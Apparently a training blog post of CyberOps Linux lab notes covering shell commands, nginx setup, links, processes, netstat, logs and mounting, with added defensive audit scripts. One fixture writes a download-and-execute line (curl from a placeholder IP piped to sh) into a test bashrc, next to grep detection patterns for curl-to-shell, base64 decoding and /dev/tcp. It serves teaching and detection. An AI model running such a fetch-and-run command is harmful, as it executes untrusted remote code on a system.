Our Cyber Security Analyst Instructor training continues at a fast pace. As part of it, I wanted to share with you the lab work we did to improve our Linux skills.

Lab Commands
Linux LAB Notes:
CyberOps Workstation VM is based on Arch Linux: lightweight, minimalist and simple.
0 – Network Settings
———————————————
ls -la
ifconfig
ls lab.support.files/scripts
cd ..
ls lab.support.files/scripts/
cat configure_as_dhcp.sh
sudo ./lab.support.files/scripts/configure_as_static.sh
ifconfig
sudo cat ./lab.support.files/scripts/configure_as_static.sh
history
I – Working in the CLI
- Basic Commands
man ls
pwd
ls -l # show permissions
ls -a # show hidden files
ls -al
cd ..
cd /etc/ # go to /etc
cd /home/analyst/ # go to analyst's home directory
cd ~ # go to the home directory (~ expands to $HOME)
mkdir belgelerim
ls
cd belgelerim
touch dosya.txt
cp # copy files
mv # move or rename files
echo "hakan" > dosya.txt # overwrite: the file is truncated and rewritten
echo "hakan" >> dosya.txt # append to the end of the file
- vi or vim or nano
vi dosya.txt
The most used commands in vi command mode are:
Command   Action
i         Enter insert mode (before the cursor)
a         Enter insert mode after the cursor
A         Enter insert mode at the end of the current line
ESC       Leave insert mode (back to command mode)
u         Undo the last change
U         Undo all changes on the current line
o         Open a new line below the cursor
dd        Delete the current line
/word     Search for "word"
n         Jump to the next match
:wq! # write, quit (! forces the write)
tail # default 10 lines
head # default 10 lines
nano dosya.txt
CTRL+O saves the current file;
CTRL+W opens the search menu.
After nano is open, for Help press CTRL+G
scite dosya.txt
3.List /etc files & permissions
ls -la /etc
.conf configuration files for system-wide services are placed in the /etc directory
ls /etc | grep conf
cat /etc/bash.bashrc # system-wide bash startup file on Arch (per-user settings go in ~/.bashrc)
In Linux distributions, this file holds the commands a user wants to run automatically whenever a terminal (interactive shell) session starts.
Purpose of bashrc:
– The logged-in user can run their own commands at shell start.
– Environment variables can be set here.
http://web.deu.edu.tr/doc/lis/lis-6.html
For example, the line PS1='\[\e[1;32m\][\u@\h \W]\$\[\e[0m\] ' defines the prompt: \u is the user name, \h the host name, \W the current directory, \e[1;32m switches the terminal to bold green and \e[0m resets it; the \[ ... \] pairs tell bash that the enclosed escape sequences print nothing, so line wrapping stays correct.
For example, change 32m to 31m and the command prompt turns red.
Because anything written in these files runs with the user's privileges at every login, they are a classic persistence spot: /etc/bash.bashrc should be owned by root and writable by root only, and ~/.bashrc by its own user only.
Since Linux is a multi-user operating system, placing per-user application configuration files under /etc would prevent users from customising their own applications; that is why per-user settings live as dotfiles in the home directory (like ~/.bashrc) while /etc holds the system-wide defaults.
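The following is an added example, not part of the lab notes: a small audit of a bash startup file, treating it as the persistence location it is. It assumes GNU stat (as on the Arch-based VM) and a hand-picked set of suspicious patterns; the two files it inspects are constructed in a temporary directory.

```bash
#!/bin/sh
# Added example, not part of the lab: audit a bash startup file as a
# persistence location. Every interactive shell sources /etc/bash.bashrc
# and ~/.bashrc, so whoever can write to either runs code at every login.
# The file must belong to the expected owner, must not be world-writable,
# and must not pull code from the network.
#
# Usage: audit_startup_file <file> <expected_owner>
# Returns 0 when every check passes, 1 otherwise (findings go to stdout).
audit_startup_file() {
    file=$1
    expected_owner=$2
    status=0

    if [ ! -f "$file" ]; then
        echo "SKIP: $file does not exist"
        return 0
    fi

    owner=$(stat -c '%U' "$file")   # GNU stat, as on the Arch-based VM
    mode=$(stat -c '%a' "$file")

    if [ "$owner" != "$expected_owner" ]; then
        echo "FAIL: $file owned by $owner, expected $expected_owner"
        status=1
    fi

    # The last octal digit holds the "other" permission bits;
    # 2, 3, 6 and 7 all include the write bit.
    case "$mode" in
        *[2367])
            echo "FAIL: $file is world-writable (mode $mode)"
            status=1 ;;
    esac

    # Download-and-execute and decode patterns. This list is an
    # assumption chosen for the example, not a complete signature set.
    if grep -nE '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)|base64[[:space:]]+(-d|--decode)|/dev/tcp/' "$file"; then
        echo "FAIL: $file contains download-and-execute or decode patterns"
        status=1
    fi

    [ "$status" -eq 0 ] && echo "OK: $file"
    return "$status"
}

# Demo on constructed files; on the VM the real targets are
# /etc/bash.bashrc (owner root) and /home/analyst/.bashrc (owner analyst).
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
me=$(id -un)

printf '%s\n' 'export EDITOR=vi' \
    'PS1="\[\e[1;32m\][\u@\h \W]\$\[\e[0m\] "' > "$demo_dir/clean.bashrc"
chmod 644 "$demo_dir/clean.bashrc"

printf '%s\n' 'export PATH=$PATH:/tmp/.bin' \
    'curl -s http://198.51.100.7/stage.sh | sh' > "$demo_dir/bad.bashrc"
chmod 666 "$demo_dir/bad.bashrc"

audit_startup_file "$demo_dir/clean.bashrc" "$me"
audit_startup_file "$demo_dir/bad.bashrc" "$me" || echo "bad.bashrc flagged as expected"
```

On the VM the calls would be `audit_startup_file /etc/bash.bashrc root` and `audit_startup_file /home/analyst/.bashrc analyst`; the pattern list is the part to extend for your own environment.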
- Editing Configuration Files for Services
~~~~~~~~~~~
nginx is a web server written by the Russian software engineer Igor Sysoev (originally developed at Rambler).
sudo nano -l /etc/nginx/custom_server.conf # -l shows line numbers, which the next steps refer to
P.S: Lines that start with ‘#’ are comments and are ignored by nginx.
On line 36, change the port number from 81 to 8080.
On line 44 and change the path
from /usr/share/nginx/html/ to /home/analyst/lab.support.files/
sudo nginx -c /etc/nginx/custom_server.conf -g "pid /var/run/nginx_v.pid;"
(-g passes a global directive on the command line; here it tells nginx which file to use
to store the process ID that identifies this instance of nginx.)
Open Firefox and enter 127.0.0.1:8080
To stop the nginx server:
sudo pkill nginx
Start the nginx server
sudo nginx -c custom_server.conf # a relative -c path is resolved against nginx's prefix directory; the full path is safer
sudo nano -l /etc/nginx/custom_server.conf
sudo pkill nginx
sudo pkill nginx
sudo nginx -c /etc/nginx/custom_server.conf -g "pid /var/run/nginx_v.pid;"
ps ax | grep nginx
wget http://127.0.0.1:8080
telnet 127.0.0.1 80 # fails: "Unable to connect to remote host: Connection refused" (nothing listens on 80)
telnet 127.0.0.1 8080 # connects (nginx is listening on 8080)
pstree
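Added example, not from the lab or from nginx itself: the two edits above (listen port and document root) done with sed on a constructed stand-in for custom_server.conf, so the result can be read back and checked before nginx is started. It assumes directive values contain no '|' or '&' characters, which are special in the sed expression.

```bash
#!/bin/sh
# Added example, not from the lab: make the two edits the lab performs by
# hand (listen port and document root) with sed, then read the values
# back so the change can be verified before nginx is started.
# Assumption: directive values contain no '|' or '&' characters.

# Usage: set_directive <conf> <directive> <value>
# Rewrites every uncommented "<directive> ...;" line; commented copies are
# untouched because the pattern is anchored at the start of the line.
set_directive() {
    conf=$1; directive=$2; value=$3
    sed -E "s|^([[:space:]]*)$directive[[:space:]]+[^;]*;|\1$directive $value;|" "$conf" \
        > "$conf.tmp" && mv "$conf.tmp" "$conf"
}

# Usage: get_directive <conf> <directive>   -> prints the first active value
get_directive() {
    sed -nE "s|^[[:space:]]*$2[[:space:]]+([^;]*);.*|\1|p" "$1" | head -n 1
}

# Constructed stand-in for /etc/nginx/custom_server.conf (the lab's file is
# longer; the relevant lines are the listen and root directives).
conf=$(mktemp)
trap 'rm -f "$conf" "$conf.tmp"' EXIT
cat > "$conf" <<'EOF'
# Lines that start with '#' are comments and are ignored by nginx.
worker_processes 1;
events { worker_connections 1024; }
http {
    server {
        # listen 81;   (commented-out copy, must stay as it is)
        listen 81;
        server_name localhost;
        location / {
            root /usr/share/nginx/html/;
            index index.html;
        }
    }
}
EOF

set_directive "$conf" listen 8080
set_directive "$conf" root /home/analyst/lab.support.files/

echo "listen -> $(get_directive "$conf" listen)"
echo "root   -> $(get_directive "$conf" root)"
grep -nE 'listen|root' "$conf"
```

Before starting the server, `sudo nginx -t -c /etc/nginx/custom_server.conf` checks the edited file for syntax errors without binding a port. Caveat: with root set to /home/analyst/lab.support.files/, everything below that directory, including scripts/, is downloadable over HTTP (the wget step above relies on exactly that); it is fine for the lab, never for a real host.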
II – (3127) Getting Familiar with the Linux Shell:
A hard link is another name (directory entry) that points to the same inode as the original file.
Hard and soft links: an edit made through either name is seen through both; only the hard link survives if the original name is removed.
ln dosya.txt hardDosya # hard link: no sudo needed, it shares the original's inode and ownership
ln -s dosya.txt softDosya # soft (symbolic) link: a separate file that stores the path "dosya.txt"
Changes are replicated on both
mv dosya.txt newfile # the inode keeps its content; only the name changes
cat hardDosya # still works
cat softDosya # cat: softDosya: No such file or directory (the stored path no longer exists)
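Added example (not the lab's own commands): the same steps in a scratch directory, with helpers that read the inode number and link count (GNU stat) so the claims above can be checked rather than taken on trust.

```bash
#!/bin/sh
# Added example, not from the lab: the hard link / symlink behaviour
# described above, reproduced in a scratch directory so the inode
# numbers and link counts can be seen rather than assumed.

inode_of()   { stat -c '%i' "$1"; }          # inode number (GNU stat)
link_count() { stat -c '%h' "$1"; }          # hard-link count of the inode
can_read()   { cat "$1" >/dev/null 2>&1; }   # 0 if the path resolves and is readable

# Usage: run_link_demo <empty directory>
# Leaves newfile, hardDosya and the dangling softDosya in place.
run_link_demo() {
    work=$1
    printf 'hakan\n' > "$work/dosya.txt"
    ln "$work/dosya.txt" "$work/hardDosya"   # second name for the same inode
    ln -s dosya.txt "$work/softDosya"        # new inode storing the path "dosya.txt",
                                             # resolved relative to the link's directory

    echo "inodes: dosya.txt=$(inode_of "$work/dosya.txt") hardDosya=$(inode_of "$work/hardDosya") softDosya=$(inode_of "$work/softDosya")"
    echo "link count of the inode after ln: $(link_count "$work/dosya.txt")"

    printf 'ikinci satir\n' >> "$work/dosya.txt"   # one write, visible through all three names
    echo "via hardDosya: $(tr '\n' ' ' < "$work/hardDosya")"
    echo "via softDosya: $(tr '\n' ' ' < "$work/softDosya")"

    mv "$work/dosya.txt" "$work/newfile"           # rename: same inode, old path gone
    can_read "$work/hardDosya" && echo "after mv: hardDosya still readable (inode unchanged)"
    can_read "$work/softDosya" || echo "after mv: softDosya is dangling -> No such file or directory"
}

demo=$(mktemp -d)
run_link_demo "$demo"
rm -rf "$demo"
```

The inode, and the data, survive until the last hard link is removed: a user who can read a file can keep a copy of it alive across a delete or an upgrade by hard-linking it, which is why Linux has the fs.protected_hardlinks sysctl (hard links only to files you own or can read and write). A symlink carries no permissions of its own; the target's permissions apply.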
Examine file types:
ls -l /dev/
- Block files (b)
- Character device files (c)
- Pipe files (p)
- Symbolic Link files (l)
- Socket files (s)
III – (3134) Linux Servers:
6.Processes related commands
ps -elf
(-e every process, -l long format, -f full format with UID, PPID and start time)
ps -ejH
Use the -ejH options to display the currently running process tree (indentation shows the parent/child relationship).
ps -elf | grep
(pipe to grep with the process name: shows which user launched the servers and with which command line; notice that the grep command itself is listed last as well)
netstat -tunap
-a: shows both listen and non-listening sockets.
-n: use numeric output (no DNS, service port or username resolution),
-p: show the PID of the connection owner process.
-t: shows TCP connections.
-u: shows UDP connections
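Added example, not from the lab: the netstat -tunap output parsed with awk to list listening sockets and flag wildcard-bound ones outside an allowlist. The netstat output is constructed for the example (the 4444/nc line is a planted unexpected listener); the column handling follows the netstat format, where UDP rows have no State column and the PID field shifts one position left.

```bash
#!/bin/sh
# Added example, not from the lab: parse "netstat -tunap" output and flag
# listening sockets bound to every interface (0.0.0.0 or ::) whose port is
# not on an allowlist. The sample output is constructed for the example.

NETSTAT_SAMPLE=$(mktemp)
trap 'rm -f "$NETSTAT_SAMPLE"' EXIT
cat > "$NETSTAT_SAMPLE" <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      398/sshd
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      1122/nginx: master
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      2045/nc
tcp        0      0 10.0.2.15:51204         93.184.216.34:443       ESTABLISHED 1640/firefox
tcp6       0      0 :::22                   :::*                    LISTEN      398/sshd
udp        0      0 0.0.0.0:68              0.0.0.0:*                           301/dhcpcd
EOF

# Usage: listening_sockets <netstat output file>
# Prints "proto local pid program" for TCP sockets in LISTEN and for
# unconnected UDP sockets. UDP rows have no State column, so the
# PID/Program field is $6 there instead of $7.
listening_sockets() {
    awk '
        $1 ~ /^tcp/ && $6 == "LISTEN" { show($7) }
        $1 ~ /^udp/ && $5 ~ /\*$/     { show($6) }
        function show(pidprog,  p) {
            split(pidprog, p, "/")              # "398/sshd" -> pid, program
            printf "%s %s %s %s\n", $1, $4, p[1], p[2]
        }' "$1"
}

# Usage: exposed_listeners <netstat output file> "<allowed ports>"
# Keeps only listeners bound to all interfaces whose port is not allowed.
exposed_listeners() {
    listening_sockets "$1" | awk -v allow="$2" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $2 ~ /^(0\.0\.0\.0:|:::)/ {
            port = $2; sub(/.*:/, "", port)     # everything after the last colon
            if (!(port in ok)) printf "%s %s pid=%s prog=%s\n", $1, $2, $3, $4
        }'
}

echo "all listeners:"
listening_sockets "$NETSTAT_SAMPLE"
echo "unexpected wildcard listeners (allowing 22 and 68):"
exposed_listeners "$NETSTAT_SAMPLE" "22 68"
```

On a live system feed it the real output (`sudo netstat -tunap > /tmp/ns.txt`; without sudo the PID/Program column is empty for other users' processes); the modern equivalent is `ss -tunap`, whose columns differ, so the field positions above would need adjusting.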
IV -(3214) Lab – Locating Log Files:
Security Info:
- Log files are extremely important for troubleshooting.
- The log file location follows the convention documented for the service (or has to be looked up).
- Clocks must always be synchronized (NTP) so that every system has the correct time and events can be correlated across logs.
8.Open an existing Log:
cat /var/log/logstash-tutorial.log
sudo more /var/log/messages
(lines 5-12 show the network interface flapping on Wednesday, March 20, from 14:28:33 to 14:29:05)
man nginx (shows: error_log /path/to/log debug; %%CONF_PATH%%; %%ERROR_LOG_PATH%%)
If nginx is not running, enter the sudo /usr/sbin/nginx
To start nginx with the custom configuration:
sudo nginx -c custom_server.conf
check if running by URL or by:
ps ax | grep nginx
ls -l /var/log/
As shown above, the /var/log directory has a subdirectory named nginx. Use the ls command again to
list the contents of /var/log/nginx.
sudo ls -l /var/log/nginx
- Monitoring Log files in Real Time
tail /var/log/nginx/access.log
sudo tail –n 5 /var/log/nginx/access.log
sudo tail -f /var/log/nginx/access.log (open browser, firefox to reload with no cache)
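Added example, not from the lab: detection logic over nginx access.log lines rather than just tailing them. The log lines are constructed for the example in nginx's default combined format; the 203.0.113.5 client is a planted path scanner, and the request for /scripts/configure_as_static.sh illustrates what a root set to lab.support.files/ exposes.

```bash
#!/bin/sh
# Added example, not from the lab: run detection logic over nginx
# access.log lines (combined log format, nginx's default). The lines are
# constructed for the example; timestamps sit in the window covered by
# the lab's /var/log/messages excerpt.

ACCESS_SAMPLE=$(mktemp)
trap 'rm -f "$ACCESS_SAMPLE"' EXIT
cat > "$ACCESS_SAMPLE" <<'EOF'
127.0.0.1 - - [20/Mar/2019:14:28:33 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/65.0"
127.0.0.1 - - [20/Mar/2019:14:28:40 +0000] "GET /scripts/ HTTP/1.1" 200 1204 "-" "Wget/1.20.1 (linux-gnu)"
127.0.0.1 - - [20/Mar/2019:14:28:41 +0000] "GET /favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/65.0"
203.0.113.5 - - [20/Mar/2019:14:29:01 +0000] "GET /.git/config HTTP/1.1" 404 153 "-" "python-requests/2.21.0"
203.0.113.5 - - [20/Mar/2019:14:29:01 +0000] "GET /.env HTTP/1.1" 404 153 "-" "python-requests/2.21.0"
203.0.113.5 - - [20/Mar/2019:14:29:02 +0000] "GET /wp-login.php HTTP/1.1" 404 153 "-" "python-requests/2.21.0"
203.0.113.5 - - [20/Mar/2019:14:29:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 153 "-" "python-requests/2.21.0"
203.0.113.5 - - [20/Mar/2019:14:29:05 +0000] "GET /scripts/configure_as_static.sh HTTP/1.1" 200 812 "-" "python-requests/2.21.0"
EOF

# Combined format, whitespace-split: $1 client, $4-$5 timestamp, $6 "METHOD,
# $7 path, $8 protocol", $9 status, $10 bytes, then referer and user agent.

# Usage: count_status <log> <code>   -> number of requests with that status
count_status() { awk -v code="$2" '$9 == code { n++ } END { print n + 0 }' "$1"; }

# Usage: status_summary <log>   -> "code count" per status, sorted by code
status_summary() { awk '{ c[$9]++ } END { for (s in c) print s, c[s] }' "$1" | sort; }

# Usage: scanning_clients <log> <min 404s>
# Clients with at least <min> 404 responses, i.e. probing paths that do not exist.
scanning_clients() {
    awk -v min="$2" '$9 == 404 { c[$1]++ } END { for (ip in c) if (c[ip] >= min) print ip, c[ip] }' "$1" | sort
}

# Usage: requests_from <log> <client ip>   -> "METHOD path" for each request
requests_from() { awk -v ip="$2" '$1 == ip { print $6, $7 }' "$1" | tr -d '"'; }

echo "status summary:";      status_summary "$ACCESS_SAMPLE"
echo "clients with >=3 404s:"; scanning_clients "$ACCESS_SAMPLE" 3
echo "what 203.0.113.5 asked for:"; requests_from "$ACCESS_SAMPLE" 203.0.113.5
```

For the live file the same awk runs on the stream: `sudo tail -f /var/log/nginx/access.log | awk '$9 == 404'` shows only the misses as they arrive. The last request in the sample is the point to notice: once the scanner knows the scripts directory exists, it is served as plain files.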
V – (3224) Navigating the Linux Filesystem and Permission Settings:
10 show mounted filesystems
mount
to display all block devices:
lsblk
- Mount existing device to directory
mkdir second_drive
ls -l second_drive/ # empty before the mount
sudo mount /dev/sdb1 ~/second_drive/
ls -l second_drive/ # now shows the files stored on /dev/sdb1
After the mount, /home/analyst/second_drive becomes the entry point to the filesystem physically stored on /dev/sdb1.
mount | grep sd
sudo umount /dev/sdb1
ls -l second_drive/ # empty again (the directory itself was never written to)
Miscellaneous:
12.pacman
pacman in Arch Linux is like apt in Ubuntu: it automates software installation and removal.
sudo pacman -Syu (-S sync, -y refresh the package database, -u upgrade installed packages; on Arch always combine -y with -u, because refreshing the database and then installing a single package leaves a partial upgrade)
To remove a single package, leaving all of its dependencies installed:
sudo pacman -R package_name
To install a single package together with its dependencies:
sudo pacman -S package_name
cat /var/log/messages | grep http